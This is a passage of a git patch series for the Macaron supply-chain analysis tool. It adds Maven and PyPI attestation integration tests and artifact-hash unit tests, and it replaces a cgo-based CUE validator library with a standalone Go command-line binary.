test_construct_primary_jar_file_name() -> None: + """Test the artifact file name function.""" + assert not construct_primary_jar_file_name(PackageURL.from_string("pkg:maven/test/example")) + + assert construct_primary_jar_file_name(PackageURL.from_string("pkg:maven/text/example@1")) == "example-1.jar" diff --git a/tests/integration/cases/github_maven_attestation/policy.dl b/tests/integration/cases/github_maven_attestation/policy.dl new file mode 100644 index 000000000..9df46219b --- /dev/null +++ b/tests/integration/cases/github_maven_attestation/policy.dl @@ -0,0 +1,10 @@ +/* Copyright (c) 2024 - 2025, Oracle and/or its affiliates. All rights reserved. 
*/ +/* Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. */ + +#include "prelude.dl" + +Policy("test_policy", component_id, "") :- + check_passed(component_id, "mcn_provenance_available_1"). + +apply_policy_to("test_policy", component_id) :- + is_component(component_id, "pkg:maven/io.liftwizard/liftwizard-checkstyle@2.1.22"). diff --git a/tests/integration/cases/github_maven_attestation/test.yaml b/tests/integration/cases/github_maven_attestation/test.yaml new file mode 100644 index 000000000..9913d930e --- /dev/null +++ b/tests/integration/cases/github_maven_attestation/test.yaml @@ -0,0 +1,22 @@ +# Copyright (c) 2024 - 2025, Oracle and/or its affiliates. All rights reserved. +# Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. + +description: | + Discovering attestation of a Maven artifact on GitHub + +tags: +- macaron-python-package + +steps: +- name: Run macaron analyze + kind: analyze + options: + command_args: + - -purl + - pkg:maven/io.liftwizard/liftwizard-checkstyle@2.1.22 + - -rp + - https://github.com/liftwizard/liftwizard +- name: Run macaron verify-policy to verify passed/failed checks + kind: verify + options: + policy: policy.dl diff --git a/tests/integration/cases/github_maven_attestation_local/policy.dl b/tests/integration/cases/github_maven_attestation_local/policy.dl new file mode 100644 index 000000000..ff31abf90 --- /dev/null +++ b/tests/integration/cases/github_maven_attestation_local/policy.dl @@ -0,0 +1,10 @@ +/* Copyright (c) 2024 - 2025, Oracle and/or its affiliates. All rights reserved. */ +/* Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. */ + +#include "prelude.dl" + +Policy("test_policy", component_id, "") :- + check_failed(component_id, "mcn_provenance_available_1"). 
+ +apply_policy_to("test_policy", component_id) :- + is_component(component_id, "pkg:maven/io.liftwizard/liftwizard-checkstyle@2.1.22"). diff --git a/tests/integration/cases/github_maven_attestation_local/test.yaml b/tests/integration/cases/github_maven_attestation_local/test.yaml new file mode 100644 index 000000000..d442b546c --- /dev/null +++ b/tests/integration/cases/github_maven_attestation_local/test.yaml @@ -0,0 +1,30 @@ +# Copyright (c) 2024 - 2025, Oracle and/or its affiliates. All rights reserved. +# Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. + +description: | + Discovering GitHub attestation of a local Maven artifact but failing because the artifact is wrong. In this case + we download the artifact's POM file and save it as a JAR file. + +tags: +- macaron-python-package +- macaron-docker-image + +steps: +- name: Download artifact POM instead of the JAR + kind: shell + options: + cmd: curl --create-dirs -o ./output/.m2/repository/io/liftwizard/liftwizard-checkstyle/2.1.22/liftwizard-checkstyle-2.1.22.jar https://repo1.maven.org/maven2/io/liftwizard/liftwizard-checkstyle/2.1.22/liftwizard-checkstyle-2.1.22.pom +- name: Run macaron analyze + kind: analyze + options: + command_args: + - -purl + - pkg:maven/io.liftwizard/liftwizard-checkstyle@2.1.22 + - -rp + - https://github.com/liftwizard/liftwizard + - --local-maven-repo + - ./output/.m2 +- name: Run macaron verify-policy to verify no provenance was found + kind: verify + options: + policy: policy.dl diff --git a/tests/integration/cases/github_pypi_attestation/policy.dl b/tests/integration/cases/github_pypi_attestation/policy.dl new file mode 100644 index 000000000..960a55e88 --- /dev/null +++ b/tests/integration/cases/github_pypi_attestation/policy.dl @@ -0,0 +1,10 @@ +/* Copyright (c) 2024 - 2025, Oracle and/or its affiliates. All rights reserved. 
*/ +/* Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. */ + +#include "prelude.dl" + +Policy("test_policy", component_id, "") :- + check_passed(component_id, "mcn_provenance_available_1"). + +apply_policy_to("test_policy", component_id) :- + is_component(component_id, "pkg:pypi/toga@0.4.8"). diff --git a/tests/integration/cases/github_pypi_attestation/test.yaml b/tests/integration/cases/github_pypi_attestation/test.yaml new file mode 100644 index 000000000..7cf096192 --- /dev/null +++ b/tests/integration/cases/github_pypi_attestation/test.yaml @@ -0,0 +1,20 @@ +# Copyright (c) 2024 - 2025, Oracle and/or its affiliates. All rights reserved. +# Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. + +description: | + Discovering attestation of a PyPI artifact on GitHub + +tags: +- macaron-python-package + +steps: +- name: Run macaron analyze + kind: analyze + options: + command_args: + - -purl + - pkg:pypi/toga@0.4.8 +- name: Run macaron verify-policy to verify passed/failed checks + kind: verify + options: + policy: policy.dl diff --git a/tests/slsa_analyzer/package_registry/test_maven_central_registry.py b/tests/slsa_analyzer/package_registry/test_maven_central_registry.py index 62b9fdca0..40b51c9ae 100644 --- a/tests/slsa_analyzer/package_registry/test_maven_central_registry.py +++ b/tests/slsa_analyzer/package_registry/test_maven_central_registry.py @@ -7,11 +7,14 @@ import os import urllib.parse from datetime import datetime +from hashlib import sha256 from pathlib import Path import pytest +from packageurl import PackageURL from pytest_httpserver import HTTPServer +from macaron.artifact.maven import construct_maven_repository_path, construct_primary_jar_file_name from macaron.config.defaults import load_defaults from macaron.errors import ConfigurationError, InvalidHTTPResponseError from macaron.slsa_analyzer.package_registry.maven_central_registry import 
MavenCentralRegistry @@ -35,6 +38,28 @@ def maven_central_instance() -> MavenCentralRegistry: ) +@pytest.fixture(name="maven_service") +def maven_service_(httpserver: HTTPServer, tmp_path: Path) -> None: + """Set up the Maven httpserver.""" + base_url_parsed = urllib.parse.urlparse(httpserver.url_for("")) + + user_config_input = f""" + [package_registry.maven_central] + request_timeout = 20 + search_netloc = {base_url_parsed.netloc} + search_scheme = {base_url_parsed.scheme} + registry_url_netloc = {base_url_parsed.netloc} + registry_url_scheme = {base_url_parsed.scheme} + """ + user_config_path = os.path.join(tmp_path, "config.ini") + with open(user_config_path, "w", encoding="utf-8") as user_config_file: + user_config_file.write(user_config_input) + # We don't have to worry about modifying the ``defaults`` object causing test + # pollution here, since we reload the ``defaults`` object before every test with the + # ``setup_test`` fixture. + load_defaults(user_config_path) + + def test_load_defaults(tmp_path: Path) -> None: """Test the ``load_defaults`` method.""" user_config_path = os.path.join(tmp_path, "config.ini") @@ -150,31 +175,14 @@ def test_is_detected( def test_find_publish_timestamp( resources_path: Path, httpserver: HTTPServer, - tmp_path: Path, + maven_service: dict, # pylint: disable=unused-argument purl: str, mc_json_path: str, query_string: str, expected_timestamp: str, ) -> None: """Test that the function finds the timestamp correctly.""" - base_url_parsed = urllib.parse.urlparse(httpserver.url_for("")) - maven_central = MavenCentralRegistry() - - # Set up responses of solrsearch endpoints using the httpserver plugin. 
- user_config_input = f""" - [package_registry.maven_central] - request_timeout = 20 - search_netloc = {base_url_parsed.netloc} - search_scheme = {base_url_parsed.scheme} - """ - user_config_path = os.path.join(tmp_path, "config.ini") - with open(user_config_path, "w", encoding="utf-8") as user_config_file: - user_config_file.write(user_config_input) - # We don't have to worry about modifying the ``defaults`` object causing test - # pollution here, since we reload the ``defaults`` object before every test with the - # ``setup_test`` fixture. - load_defaults(user_config_path) maven_central.load_defaults() with open(os.path.join(resources_path, "maven_central_files", mc_json_path), encoding="utf8") as page: @@ -208,35 +216,19 @@ def test_find_publish_timestamp( def test_find_publish_timestamp_errors( resources_path: Path, httpserver: HTTPServer, - tmp_path: Path, + maven_service: dict, # pylint: disable=unused-argument purl: str, mc_json_path: str, expected_msg: str, ) -> None: """Test that the function handles errors correctly.""" - base_url_parsed = urllib.parse.urlparse(httpserver.url_for("")) - maven_central = MavenCentralRegistry() - - # Set up responses of solrsearch endpoints using the httpserver plugin. - user_config_input = f""" - [package_registry.maven_central] - request_timeout = 20 - search_netloc = {base_url_parsed.netloc} - search_scheme = {base_url_parsed.scheme} - """ - user_config_path = os.path.join(tmp_path, "config.ini") - with open(user_config_path, "w", encoding="utf-8") as user_config_file: - user_config_file.write(user_config_input) - # We don't have to worry about modifying the ``defaults`` object causing test - # pollution here, since we reload the ``defaults`` object before every test with the - # ``setup_test`` fixture. 
- load_defaults(user_config_path) maven_central.load_defaults() with open(os.path.join(resources_path, "maven_central_files", mc_json_path), encoding="utf8") as page: mc_json_response = json.load(page) + # Set up responses of solrsearch endpoints using the httpserver plugin. httpserver.expect_request( "/solrsearch/select", query_string="q=g:org.apache.logging.log4j+AND+a:log4j-core+AND+v:3.0.0-beta2&core=gav&rows=1&wt=json", @@ -245,3 +237,52 @@ def test_find_publish_timestamp_errors( pat = f"^{expected_msg}" with pytest.raises(InvalidHTTPResponseError, match=pat): maven_central.find_publish_timestamp(purl=purl) + + +@pytest.mark.parametrize("purl_string", ["pkg:maven/example", "pkg:maven/example/test", "pkg:maven/example/test@1"]) +def test_get_artifact_hash_failures( + httpserver: HTTPServer, maven_service: dict, purl_string: str # pylint: disable=unused-argument +) -> None: + """Test failures of get artifact hash.""" + purl = PackageURL.from_string(purl_string) + + maven_registry = MavenCentralRegistry() + maven_registry.load_defaults() + + if purl.namespace and purl.version and (file_name := construct_primary_jar_file_name(purl)) and file_name: + artifact_path = "/" + construct_maven_repository_path(purl.namespace, purl.name, purl.version) + "/" + file_name + hash_algorithm = sha256() + hash_algorithm.update(b"example_data") + expected_hash = hash_algorithm.hexdigest() + httpserver.expect_request(artifact_path + ".sha256").respond_with_data(expected_hash) + httpserver.expect_request(artifact_path).respond_with_data(b"example_data_2") + + result = maven_registry.get_artifact_hash(purl) + + assert not result + + +def test_get_artifact_hash_success( + httpserver: HTTPServer, maven_service: dict # pylint: disable=unused-argument +) -> None: + """Test success of get artifact hash.""" + purl = PackageURL.from_string("pkg:maven/example/test@1") + assert purl.namespace + assert purl.version + + maven_registry = MavenCentralRegistry() + maven_registry.load_defaults() + 
+ file_name = construct_primary_jar_file_name(purl) + assert file_name + + artifact_path = "/" + construct_maven_repository_path(purl.namespace, purl.name, purl.version) + "/" + file_name + hash_algorithm = sha256() + hash_algorithm.update(b"example_data") + expected_hash = hash_algorithm.hexdigest() + httpserver.expect_request(artifact_path + ".sha256").respond_with_data(expected_hash) + httpserver.expect_request(artifact_path).respond_with_data(b"example_data") + + result = maven_registry.get_artifact_hash(purl) + + assert result From 279a0013fc7b9af5a82e0ab28d90f1c360c5b90a Mon Sep 17 00:00:00 2001 From: Behnaz Hassanshahi Date: Fri, 6 Jun 2025 16:15:28 +1000 Subject: [PATCH 07/14] build: replace shared library with standalone cuevalidator binary (#1096) This PR replaces the Go shared library previously used via C-bindings in Python with a standalone binary for the cuevalidator component. The binary can now be invoked as a subprocess, simplifying integration and improving portability. 
Signed-off-by: behnazh-w --- Makefile | 1 - golang/README.md | 43 +++--- golang/cmd/cuevalidator/README.md | 45 ++++++ golang/cmd/cuevalidator/cuevalidator.go | 110 +++++++++++++++ golang/internal/cue_validator/cgo_helper.go | 36 ----- .../internal/cue_validator/cue_validator.go | 80 ----------- golang/internal/cuevalidator/cuevalidator.go | 61 ++++++++ .../cuevalidator_test.go} | 37 ++++- .../resources/invalid_policy.cue | 0 .../resources/invalid_provenance.json | 0 .../resources/valid_policy.cue | 0 .../resources/valid_provenance.json | 0 .../resources/valid_provenance2.json | 0 src/macaron/config/global_config.py | 4 +- .../provenance/expectations/cue/__init__.py | 4 +- .../expectations/cue/cue_validator.py | 130 ++++++++++-------- .../provenance/expectations/expectation.py | 14 +- .../expectations/cue/test_cue_validator.py | 31 +++-- 18 files changed, 374 insertions(+), 222 deletions(-) create mode 100644 golang/cmd/cuevalidator/README.md create mode 100644 golang/cmd/cuevalidator/cuevalidator.go delete mode 100644 golang/internal/cue_validator/cgo_helper.go delete mode 100644 golang/internal/cue_validator/cue_validator.go create mode 100644 golang/internal/cuevalidator/cuevalidator.go rename golang/internal/{cue_validator/cue_validator_test.go => cuevalidator/cuevalidator_test.go} (69%) rename golang/internal/{cue_validator => cuevalidator}/resources/invalid_policy.cue (100%) rename golang/internal/{cue_validator => cuevalidator}/resources/invalid_provenance.json (100%) rename golang/internal/{cue_validator => cuevalidator}/resources/valid_policy.cue (100%) rename golang/internal/{cue_validator => cuevalidator}/resources/valid_provenance.json (100%) rename golang/internal/{cue_validator => cuevalidator}/resources/valid_provenance2.json (100%) diff --git a/Makefile b/Makefile index 029cdc163..95365036e 100644 --- a/Makefile +++ b/Makefile @@ -93,7 +93,6 @@ setup: force-upgrade setup-go setup-binaries setup-schemastore go install 
github.com/CycloneDX/cyclonedx-gomod/cmd/cyclonedx-gomod@v1.3.0 setup-go: go build -o $(PACKAGE_PATH)/bin/ $(REPO_PATH)/golang/cmd/... - go build -o $(PACKAGE_PATH)/bin/cuevalidate.so -buildmode=c-shared $(REPO_PATH)/golang/internal/cue_validator/cue_validator.go setup-binaries: $(PACKAGE_PATH)/bin/slsa-verifier $(PACKAGE_PATH)/resources/mvnw $(PACKAGE_PATH)/resources/gradlew souffle gnu-sed $(PACKAGE_PATH)/bin/slsa-verifier: git clone --depth 1 https://github.com/slsa-framework/slsa-verifier.git -b v2.6.0 diff --git a/golang/README.md b/golang/README.md index 37f0f0d4b..4cefbe323 100644 --- a/golang/README.md +++ b/golang/README.md @@ -1,10 +1,10 @@ # Go module documentation ## Quick start Prerequisites -- Go (tested on `go1.17.8 linux/amd64`). Installation instructions [here](https://go.dev/doc/install). +- Go (tested on `go 1.23.0 linux/amd64`). Installation instructions [here](https://go.dev/doc/install). - Prepare the required libraries by running this command from the root dir of this repository: -``` +```bash go mod download ``` This command will download all packages as defined in [go.mod](../../../go.mod) and [go.sum](../../../go.sum). @@ -12,17 +12,17 @@ This command will download all packages as defined in [go.mod](../../../go.mod) ### Project layout This go module follows the Golang project layout as specified in [golang-standards/project-layout](https://github.com/golang-standards/project-layout). 
-``` +```bash macaron ├── golang -│ ├── cmd -│ │ └── bashparser -│ ├── internal -│ │ ├── bashparser -│ │ ├── cue_validator -│ │ └── filewriter -│ ├── pkg -│ └── README.md +│   ├── cmd +│   │   ├── bashparser +│   │   └── cuevalidator +│   ├── internal +│   │   ├── bashparser +│   │   ├── cuevalidator +│   │   └── filewriter +│   └── README.md ├── go.mod ├── go.sum └── @@ -36,32 +36,39 @@ macaron ### Run the application code directly using Go To run an application (in the `cmd` dir), from the root dir of this repository: -``` +```bash go run ./golang/cmd//.go [ARGS] ``` -For example, to run the [actionparser](./cmd/actionparser/README.md) application: -``` -go run ./golang/cmd/actionparser/actionparser.go -file ./golang/internal/actionparser/resources/valid.yaml -``` ### Run the Go tests To run all the tests, from the root dir of this repository: +```bash +make test ``` + +To just run the Go tests: +```bash go test ./golang/... ``` To run the tests and record the code coverage, from the root dir of this repository: -``` +```bash go test -cover ./golang/... ``` ### Build the executable To build an executable of an application in this module: + +```bash +make setup-go ``` + +Alternatively you can run: +```bash go build ./golang/cmd//.go ``` This will generate an executable `app_name` in the current directory. We can also change the path of the output executable by using: -``` +```bash go build -o ./golang/cmd//.go ``` diff --git a/golang/cmd/cuevalidator/README.md b/golang/cmd/cuevalidator/README.md new file mode 100644 index 000000000..4e68d7fe7 --- /dev/null +++ b/golang/cmd/cuevalidator/README.md @@ -0,0 +1,45 @@ +# CUE Validator + +This Go module validates CUE provenance against a policy and extracts analysis targets using [CUE](https://cuelang.org/). 
+ +### Run the CUE Validator directly + +To run the validator, from the root directory of this repository: + +```bash +go run ./golang/cmd/cuevalidator/cuevalidator.go -h +``` + + +#### Commands: + +- `-target-policy `: The CUE policy path from which to extract the target. +- `-validate-policy `: The CUE policy path to validate the provenance against. +- `-validate-provenance `: The provenance payload path to validate. + +### Examples: + +1. **Extract Target from Policy** + To extract the target from a CUE policy, use the following command: + +```bash +go run ./golang/cmd/cuevalidator/cuevalidator.go -target-policy +``` + +Output: + +```bash +pkg:maven/io.micronaut/micronaut-core +``` + +2. **Validate Provenance Against Policy** +To validate provenance against a policy, use the following command: + +```bash +go run ./golang/cmd/cuevalidator/cuevalidator.go -validate-policy -validate-provenance +``` + +### Error Handling: + +- If required arguments are missing or invalid, the program will print an error message to `stderr` and exit with a non-zero status code. +- If the validation fails, an error message will be printed, and the program will exit with an appropriate error code. diff --git a/golang/cmd/cuevalidator/cuevalidator.go b/golang/cmd/cuevalidator/cuevalidator.go new file mode 100644 index 000000000..d9cff56e4 --- /dev/null +++ b/golang/cmd/cuevalidator/cuevalidator.go @@ -0,0 +1,110 @@ +/* Copyright (c) 2025 - 2025, Oracle and/or its affiliates. All rights reserved. */ +/* Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. */ + +package main + +import ( + "flag" + "fmt" + "os" + + "github.com/oracle/macaron/golang/internal/cuevalidator" +) + +// Utility function to handle file reading and errors. 
+func readFile(path string) ([]byte, error) { + content, err := os.ReadFile(path) + if err != nil { + return nil, fmt.Errorf("failed to read file '%s': %w", path, err) + } + return content, nil +} + +// Handle validation errors. +func handleError(message string, code int) { + fmt.Fprintln(os.Stderr, message) + os.Exit(code) +} + +// Main entry point for the CUE Validator tool. +// This function processes command-line flags to execute one of the following commands: +// - Extract a target from a CUE policy (using -target-policy flag). +// - Validate provenance against a CUE policy (using -validate-policy and -validate-provenance flags). +// +// Params: +// +// -target-policy : the CUE policy to extract the target from. +// -validate-policy : the CUE policy to validate the provenance against. +// -validate-provenance : the provenance data to validate. +// +// Return code: +// +// 0 - If the target is successfully extracted or the provenance validation finishes with no errors. +// 1 - If there is a missing required argument or invalid command usage. +// 2 - If an error occurs during validation (e.g., invalid provenance or policy). +// +// Usage: +// +// 1. To extract the target from a policy: +// go run cuevalidator.go -target-policy +// Output: The extracted target will be printed to stdout. +// +// 2. To validate provenance against a policy: +// go run cuevalidator.go -validate-policy -validate-provenance +// Output: A success or failure message will be printed based on the validation result. +func main() { + // Define flags for the target command. + targetPolicy := flag.String("target-policy", "", "Path to CUE policy to extract the target from.") + + // Define flags for the validate command + validatePolicy := flag.String("validate-policy", "", "Path to CUE policy to validate against.") + validateProvenance := flag.String("validate-provenance", "", "Path to provenance data to validate.") + + // Parse flags + flag.Parse() + + // Handle 'target-policy' command. 
+ if *targetPolicy != "" { + policyContent, err := readFile(*targetPolicy) + if err != nil { + handleError(err.Error(), 2) + } + + result := cuevalidator.Target(string(policyContent)) + if result == "" { + handleError("Error: Unable to extract target from policy.", 2) + } + + fmt.Print(result) + return + } + + // Handle 'validate' command. + if *validatePolicy != "" && *validateProvenance != "" { + policyContent, err := readFile(*validatePolicy) + if err != nil { + handleError(err.Error(), 2) + } + + provenanceContent, err := readFile(*validateProvenance) + if err != nil { + handleError(err.Error(), 2) + } + + result := cuevalidator.Validate(string(policyContent), string(provenanceContent)) + switch result { + case 1: + fmt.Print("True") + os.Exit(0) + case 0: + fmt.Print("False") + os.Exit(0) + default: + handleError("Error: Validation encountered an issue.", 2) + } + return + } + + // If no valid command was given, print usage message + handleError("Error: Missing required arguments for target or validate command.", 1) +} diff --git a/golang/internal/cue_validator/cgo_helper.go b/golang/internal/cue_validator/cgo_helper.go deleted file mode 100644 index c90984188..000000000 --- a/golang/internal/cue_validator/cgo_helper.go +++ /dev/null @@ -1,36 +0,0 @@ -/* Copyright (c) 2023 - 2023, Oracle and/or its affiliates. All rights reserved. */ -/* Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. */ - -// This module provides CGO helper functions for testing. -package main - -import ( - "C" - "os" - "path" - "runtime" - "testing" -) - -// Get the path to the resources directory. -func GetResourcesPath(t *testing.T) string { - _, filename, _, ok := runtime.Caller(1) - if !ok { - t.Errorf("Unable to locate resources.") - } - return path.Join(path.Dir(filename), "resources") -} - -// Load resource file. 
-func LoadResource(t *testing.T, name string) *C.char { - path := path.Join(GetResourcesPath(t), name) - content, err := os.ReadFile(path) - if err != nil { - t.Errorf("Unable to load the policy content from %s.", path) - } - return C.CString(string(content)) -} - -func GetGoString(value *C.char) string { - return C.GoString(value) -} diff --git a/golang/internal/cue_validator/cue_validator.go b/golang/internal/cue_validator/cue_validator.go deleted file mode 100644 index fe5b14306..000000000 --- a/golang/internal/cue_validator/cue_validator.go +++ /dev/null @@ -1,80 +0,0 @@ -/* Copyright (c) 2023 - 2023, Oracle and/or its affiliates. All rights reserved. */ -/* Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. */ - -// CUE Validator runs CUE and validates a provenance against a policy. -// See: https://cuelang.org/docs/about/ - -package main - -import ( - "C" - "strings" - - "cuelang.org/go/cue" - "cuelang.org/go/cue/cuecontext" - "cuelang.org/go/encoding/json" -) - -// target returns the analysis target repo for the provided policy content. -// Returns target string value if successful and nil if error has occurred. -// -//export target -func target(policy *C.char) *C.char { - ctx := cuecontext.New() - _policy := C.GoString(policy) - value := ctx.CompileString(_policy) - policy_err := value.Err() - if policy_err != nil { - return nil - } - - target_value := value.LookupPath(cue.ParsePath("target")) - target_err := target_value.Err() - if target_err != nil { - return nil - } - target_path, str_err := target_value.String() - if str_err != nil { - return nil - } - - // We need to be careful about memory leaks on the Python side. - // The documentation at https://pkg.go.dev/cmd/cgo says: - // The C string is allocated in the C heap using malloc. - // It is the caller's responsibility to arrange for it to be - // freed. 
- return C.CString(strings.TrimSpace(target_path)) -} - -// validate validates the provenance against a CUE policy. -// Returns 1 if policy conforms with the provenance, 0 if -// provenance is invalid, and -1 if CUE returns a validation error. -// -//export validate -func validate(policy *C.char, provenance *C.char) int32 { - _policy := C.GoString(policy) - _provenance := C.GoString(provenance) - - ctx := cuecontext.New() - value := ctx.CompileString(_policy) - - resolved_value := ctx.CompileString(_provenance, cue.Scope(value)) - res_err := resolved_value.Err() - if res_err != nil { - // Unable to process the provenance. - return -1 - } - - validate_err := json.Validate([]byte(_provenance), value) - if validate_err != nil { - // Validation failed. - return 0 - } - - // The provenance conforms with the policy. - return 1 -} - -func main() { - -} diff --git a/golang/internal/cuevalidator/cuevalidator.go b/golang/internal/cuevalidator/cuevalidator.go new file mode 100644 index 000000000..75a1ba8a4 --- /dev/null +++ b/golang/internal/cuevalidator/cuevalidator.go @@ -0,0 +1,61 @@ +/* Copyright (c) 2023 - 2025, Oracle and/or its affiliates. All rights reserved. */ +/* Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. */ + +// CUE Validator runs CUE and validates a provenance against a policy. +// See: https://cuelang.org/docs/about/ + +package cuevalidator + +import ( + "strings" + + "cuelang.org/go/cue" + "cuelang.org/go/cue/cuecontext" + "cuelang.org/go/encoding/json" +) + +// Target extracts the target from a given CUE policy string. +// It returns the extracted target if successful, or an empty string if an error occurs. 
+func Target(policy string) string { + ctx := cuecontext.New() + value := ctx.CompileString(policy) + policyErr := value.Err() + if policyErr != nil { + return "" + } + + targetValue := value.LookupPath(cue.ParsePath("target")) + targetErr := targetValue.Err() + if targetErr != nil { + return "" + } + targetPath, strErr := targetValue.String() + if strErr != nil { + return "" + } + + return strings.TrimSpace(targetPath) +} + +// Validate validates the provenance against the given CUE policy. +// It returns 1 if the provenance conforms to the policy, 0 if it does not, and -1 if there is an unexpected error. +func Validate(policy string, provenance string) int32 { + ctx := cuecontext.New() + value := ctx.CompileString(policy) + + resolvedValue := ctx.CompileString(provenance, cue.Scope(value)) + resErr := resolvedValue.Err() + if resErr != nil { + // Unable to process the provenance. + return -1 + } + + validateErr := json.Validate([]byte(provenance), value) + if validateErr != nil { + // Validation failed. + return 0 + } + + // The provenance conforms with the policy. + return 1 +} diff --git a/golang/internal/cue_validator/cue_validator_test.go b/golang/internal/cuevalidator/cuevalidator_test.go similarity index 69% rename from golang/internal/cue_validator/cue_validator_test.go rename to golang/internal/cuevalidator/cuevalidator_test.go index c546e9fb0..a2f51ff42 100644 --- a/golang/internal/cue_validator/cue_validator_test.go +++ b/golang/internal/cuevalidator/cuevalidator_test.go @@ -1,12 +1,34 @@ -/* Copyright (c) 2023 - 2023, Oracle and/or its affiliates. All rights reserved. */ +/* Copyright (c) 2023 - 2025, Oracle and/or its affiliates. All rights reserved. */ /* Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. */ -package main +package cuevalidator import ( + "os" + "path" + "runtime" "testing" ) +// Get the path to the resources directory. 
+func GetResourcesPath(t *testing.T) string { + _, filename, _, ok := runtime.Caller(1) + if !ok { + t.Errorf("Unable to locate resources.") + } + return path.Join(path.Dir(filename), "resources") +} + +func LoadResource(t *testing.T, name string) string { + path := path.Join(GetResourcesPath(t), name) + data, err := os.ReadFile(path) + if err != nil { + t.Fatalf("Failed to read file: %s", err) + } + return string(data) +} + +// Test_Target tests the Target function for extracting the target from a CUE policy. func Test_Target(t *testing.T) { tests := []struct { name string @@ -16,7 +38,7 @@ func Test_Target(t *testing.T) { { name: "get target from invalid policy", path: "invalid_policy.cue", - expected: GetGoString(nil), + expected: "", }, { name: "get target from valid policy", @@ -28,16 +50,17 @@ func Test_Target(t *testing.T) { test := test // Re-initialize the test. t.Run(test.name, func(t *testing.T) { policy := LoadResource(t, test.path) - value := target(policy) + value := Target(policy) // GoLang doesn’t provide any built-in support for assert. - if GetGoString(value) != test.expected { - t.Errorf("Expected %s but got %s.", test.expected, GetGoString(value)) + if value != test.expected { + t.Errorf("Expected %s but got %s.", test.expected, value) } }) } } +// Test_ValidatePolicy tests the Validate function for validating the provenance against a CUE policy. 
func Test_ValidatePolicy(t *testing.T) { tests := []struct { name string @@ -82,7 +105,7 @@ func Test_ValidatePolicy(t *testing.T) { t.Run(test.name, func(t *testing.T) { policy := LoadResource(t, test.policy_path) provenance := LoadResource(t, test.provenance_path) - result := validate(policy, provenance) + result := Validate(policy, provenance) if result != test.expected { t.Errorf("Expected %d but got %d.", test.expected, result) } diff --git a/golang/internal/cue_validator/resources/invalid_policy.cue b/golang/internal/cuevalidator/resources/invalid_policy.cue similarity index 100% rename from golang/internal/cue_validator/resources/invalid_policy.cue rename to golang/internal/cuevalidator/resources/invalid_policy.cue diff --git a/golang/internal/cue_validator/resources/invalid_provenance.json b/golang/internal/cuevalidator/resources/invalid_provenance.json similarity index 100% rename from golang/internal/cue_validator/resources/invalid_provenance.json rename to golang/internal/cuevalidator/resources/invalid_provenance.json diff --git a/golang/internal/cue_validator/resources/valid_policy.cue b/golang/internal/cuevalidator/resources/valid_policy.cue similarity index 100% rename from golang/internal/cue_validator/resources/valid_policy.cue rename to golang/internal/cuevalidator/resources/valid_policy.cue diff --git a/golang/internal/cue_validator/resources/valid_provenance.json b/golang/internal/cuevalidator/resources/valid_provenance.json similarity index 100% rename from golang/internal/cue_validator/resources/valid_provenance.json rename to golang/internal/cuevalidator/resources/valid_provenance.json diff --git a/golang/internal/cue_validator/resources/valid_provenance2.json b/golang/internal/cuevalidator/resources/valid_provenance2.json similarity index 100% rename from golang/internal/cue_validator/resources/valid_provenance2.json rename to golang/internal/cuevalidator/resources/valid_provenance2.json diff --git a/src/macaron/config/global_config.py 
b/src/macaron/config/global_config.py index 8befb4045..0ef2c2849 100644 --- a/src/macaron/config/global_config.py +++ b/src/macaron/config/global_config.py @@ -94,12 +94,12 @@ def load_expectation_files(self, exp_path: str) -> None: exp_files = [] if os.path.isdir(exp_path): for policy_path in os.listdir(exp_path): - policy_file_path = os.path.join(exp_path, policy_path) + policy_file_path = os.path.abspath(os.path.join(exp_path, policy_path)) if os.path.isfile(policy_file_path): exp_files.append(policy_file_path) logger.info("Added provenance expectation file %s", os.path.relpath(policy_file_path, os.getcwd())) elif os.path.isfile(exp_path): - exp_files.append(exp_path) + exp_files.append(os.path.abspath(exp_path)) logger.info("Added provenance expectation file %s", os.path.relpath(exp_path, os.getcwd())) self.expectation_paths = exp_files diff --git a/src/macaron/slsa_analyzer/provenance/expectations/cue/__init__.py b/src/macaron/slsa_analyzer/provenance/expectations/cue/__init__.py index c457d316f..2f8caf3de 100644 --- a/src/macaron/slsa_analyzer/provenance/expectations/cue/__init__.py +++ b/src/macaron/slsa_analyzer/provenance/expectations/cue/__init__.py @@ -66,9 +66,9 @@ def make_expectation(cls, expectation_path: str) -> Self | None: with open(expectation_path, encoding="utf-8") as expectation_file: expectation.text = expectation_file.read() expectation.sha = str(hashlib.sha256(expectation.text.encode("utf-8")).hexdigest()) - expectation.target = cue_validator.get_target(expectation.text) + expectation.target = cue_validator.get_target(expectation_path) expectation._validator = ( # pylint: disable=protected-access - lambda provenance: cue_validator.validate_expectation(expectation.text, provenance) + lambda provenance_path: cue_validator.validate_expectation(expectation_path, provenance_path) ) except (OSError, CUERuntimeError, CUEExpectationError) as error: logger.error("CUE expectation error: %s", error) diff --git 
